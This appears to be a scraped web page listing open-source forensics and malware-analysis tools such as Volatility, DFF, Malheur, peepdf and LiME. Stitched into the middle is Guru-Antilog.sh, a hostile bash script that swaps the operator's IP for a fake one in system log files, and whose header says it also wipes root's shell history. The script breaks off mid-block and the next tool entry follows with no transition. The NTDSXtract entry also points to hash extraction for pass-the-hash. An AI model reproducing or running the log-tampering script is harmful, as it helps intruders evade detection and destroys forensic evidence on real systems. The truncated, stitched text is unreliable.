Forensics

PlainSight

PlainSight is a versatile computer forensics environment that allows inexperienced forensic practitioners perform common tasks using powerful open source tools. taken the best open source forensic/security tools, customized them, and combined them with an intuitive user interface to create an incredibly powerful forensic environment.

With PlainSight you can perform operations such as:

Get hard disk and partition information
Extract user and group information
View Internet histories
Examine Windows firewall configuration
Discover recent documents
Recover/Carve over 15 different file types
Discover USB storage information
Examine physical memory dumps
Examine UserAssist information
Extract LanMan password hashes
Preview a system before acquiring it

volatility

The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independent of the system being investigated but offer visibilty into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and provide a platform for further work into this exciting area of research.

Digital Forensics Framework

Digital Forensics Framework
DFF is an Open Source computer forensics platform built on top of a dedicated Application Programming Interface (API). DFF proposes an alternative to the aging digital forensics solutions used today. Designed for simple use and automation, the DFF interface guides the user through the main steps of a digital investigation so it can be used by both professional and non-expert to quickly and easily conduct a digital investigations and perform incident response.

NTDSXtract

Overview:
Technically a forensics framework for analyzing NTDS.dit files. On the other side, it can be used to extract password hashes from the NTDS.dit file that can be used for pass the hash or cracking.

Tutorials:
Dumping a volume shadow copy and extracting - https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/

Guru-Antilog.sh

A bash script to wipe or exchange your IP in unix log files. Also wipes out /root/.bash_history.

#!/bin/bash
# Guru-Antilog V 0.1
# usage : to Exchanging your IP with fake IP y0 choose it
# and to clear your last command's and clear logout history  
# Remember that...
# y0 have one minute to logout from b0x no more.. so be carefull
# Fuck the whitehats
#
clear
echo "--------------------------------------------------------------------------------------------------------------------"
echo "                     Guru-Antilog c0ded  By [ sAFA7_eLNeT ] (SecurityGurus.NeT) - SecurityGurus[AT]irc.dal.net:6667 "
echo "  Greetz g0es to : Acid-WarZ,rOCk-MaStEr,j7a,MedoZero,Spiderz,and all SecurityGurus.NeT PPL and all 1--5.com folks "
echo "--------------------------------------------------------------------------------------------------------------------"
if [ "$UID" = "0" ];then
echo " h3re w3 g0 "
else
echo " `whoami` y0 must be login by root"
fi
echo -n " What's the ip y0 want to spoof it ?  "
read word
word=$word
echo -n " What's the Fake ip y0 want  using it ? "
read fake
fake=$fake
r0x="yes"
if [ ! -f /var/log/lastlog ]; then
r0x="no"
echo " i can't find lastlog"
fi
if [ "$r0x" = "yes" ]; then
echo " Editing lastlog"
sed "s/$word/$fake/g" /var/log/lastlog > /var/log/lastlog.new
mv /var/log/lastlog.new /var/log/lastlog
fi
syslog="yes"
if [ ! -f /var/log/syslog ]; then
echo " i can't find syslog"
 syslog="no"
fi
if [ "$syslog" = "yes" ]; then
echo " Editing syslog"
sed "s/$word/$fake/g" /var/log/syslog > /var/log/syslog.new
mv /var/log/syslog.new /var/log/syslog
fi
mess="yes"
if [ ! -f /var/log/messages ]; then
 echo " i can't find message "
mess="no"
fi
if [ "$mess" = "yes" ]; then
echo " Editing message"
sed "s/$word/$fake/g" /var/log/messages > /var/log/messages.new
mv /var/log/messages.new /var/log/messages
fi
http="yes"
if [ ! -f /var/log/httpd/access_log ]; then
 echo " i can't find access_log "

OpenFPC

OpenFPC is a set of scripts that combine to provide a lightweight full-packet network traffic recorder & buffering tool. It's design goal is to allow non-expert users to deploy a distributed network traffic recorder on COTS hardware while integrating into existing alert and log tools.

OpenFPC is described as lightweight because it follows a different design model to other FPC/Network traffic forensic tools that I have seen. It doesn't provide a user with the ability to trigger automatic events (IDS-like functions), or watch for anomalous traffic changes (NBA-like functions) as it is assumed external open source, or comercial tools already provide this detection capability. OpenFPC fits in as a companion to provide extra (full packet/traffic stream) data as a bolt-on to these tools allowing deeper analysis of event data where required.

Simply give it a logfile entry in one of the supported formats, and it will provide you with the PCAP.

For more information, visit the OpenFPC project home at http://www.openfpc.org
Features and futures

Automated install on Debain and RH style distributions
Extraction of single streams based on event occurrence time, or start/end timestamps
Extracts stream data based on common logfile/alert formats

Distributed collection with central extraction Optional compression and extract checksums Ability to request data from external tools/user interfaces
TODO

Central web-based UI for stream/data extraction from distributed remote storage buffers
Automatic calculation of an optimal configuration for extraction speed based on available storage.

Malheur Malware Analyzer

Malheur is a tool for the automatic analysis of malware behavior (program behavior recorded from malicious software in a sandbox environment). It has been designed to support the regular analysis of malicious software and the development of detection and defense measures. Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes.

Malheur builds on the concept of dynamic analysis: Malware binaries are collected in the wild and executed in a sandbox, where their behavior is monitored during run-time. The execution of each malware binary results in a report of recorded behavior. Malheur analyzes these reports for discovery and discrimination of malware classes using machine learning.

Malheur can be applied to recorded behavior of various format, as long as monitored events are separated by delimiter symbols, for example as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox and Joebox.

Extraction of prototypes. From a given set of reports, Malheur identifies a subset of prototypes representative for the full data set. The prototypes provide a quick overview of recorded behavior and can be used to guide manual inspection.

Clustering of behavior. Malheur automatically identifies groups (clusters) of reports containing similar behavior. Clustering allows for discovering novel classes of malware and provides the basis for crafting specific detection and defense mechanisms, such as anti-virus signatures.

Classification of behavior. Based on a set of previously clustered reports, Malheur is able to assign unknown behavior to known groups of malware. Classification enables identifying novel variants of malware and can be used to filter program behavior prior to manual inspection.

Hook Analyser Malware Tool

Malware Analyser is a freeware tool to perform static and dynamic analysis of the malwares.
Author: Beenu Arora

The features are:
String based analysis for registry, API calls, IRC Commands, DLL’s called and VMAware.
Display detailed headers of PE with all its section details, import and export symbols etc.
On distros, can perform an ASCII dump of the PE along with other options (check –help argument).

For windows, it can generate various section of a PE : DOS Header, DOS Stub, PE File Header, Image Optional Header, Section Table, Data Directories, Sections
ASCII dump on windows machine.
Code Analysis (disassembling)
Online malware checking (www.virustotal.com)
Check for Packer from the Database.

Tracer functionality: Can be used to identify
Anti-debugging Calls tricks, File system manipulations Calls Rootkit Hooks, Keyboard Hooks, DEP Setting Change, Network Identification traces.

Signature Creation: Allows to create signature of malware.
Batch Mode Scan to Scan all DLL and Exe in directories and sub-directories

Recent updates:
--Added Traces signatures
--Improved parsing
--Added ThreatExpert for online scanning option
--Packed libraries onto single executable
--Improved Traces signatures

peepdf

peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not. The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to make all the tasks. With peepdf it's possible to see all the objects in the document showing the suspicious elements, supports all the most used filters and encodings, it can parse different versions of a file, object streams and encrypted files. With the installation of PyV8 and Pylibemu it provides Javascript and shellcode analysis wrappers too. Apart of this it's able to create new PDF files and to modify/obfuscate existent ones.

The main functionalities of peepdf are the following:

Analysis:
Decodings: hexadecimal, octal, name objects
More used filters
References in objects and where an object is referenced
Strings search (including streams)
Physical structure (offsets)
Logical tree structure
Metadata
Modifications between versions (changelog)
Compressed objects (object streams)
Analysis and modification of Javascript (Spidermonkey): unescape, replace, join
Shellcode analysis (Libemu python wrapper, pylibemu)
Variables (set command)
Extraction of old versions of the document
Easy extraction of objects, Javascript code, shellcodes (>, >>, $>, $>>)
Checking hashes on VirusTotal

Creation/Modification:
Basic PDF creation
Creation of PDF with Javascript executed wen the document is opened
Creation of object streams to compress objects
Embedded PDFs
Strings and names obfuscation
Malformed PDF output: without endobj, garbage in the header, bad header...
Filters modification
Objects modification

Execution modes:
Simple command line execution
Powerful interactive console (colorized or not)
Batch mode

TODO:
Embedded PDFs analysis
Improving automatic Javascript analysis

LiME Forensics

LiME (formerly DMD) is a Loadable Kernel Module (LKM), which allows the acquisition of volatile memory from Linux and Linux-based devices, such as those powered by Android. The tool supports acquiring memory either to the file system of the device or over the network. LiME is unique in that it is the first tool that allows full memory captures from Android devices. It also minimizes its interaction between user and kernel space processes during acquisition, which allows it to produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition.

Syndicate content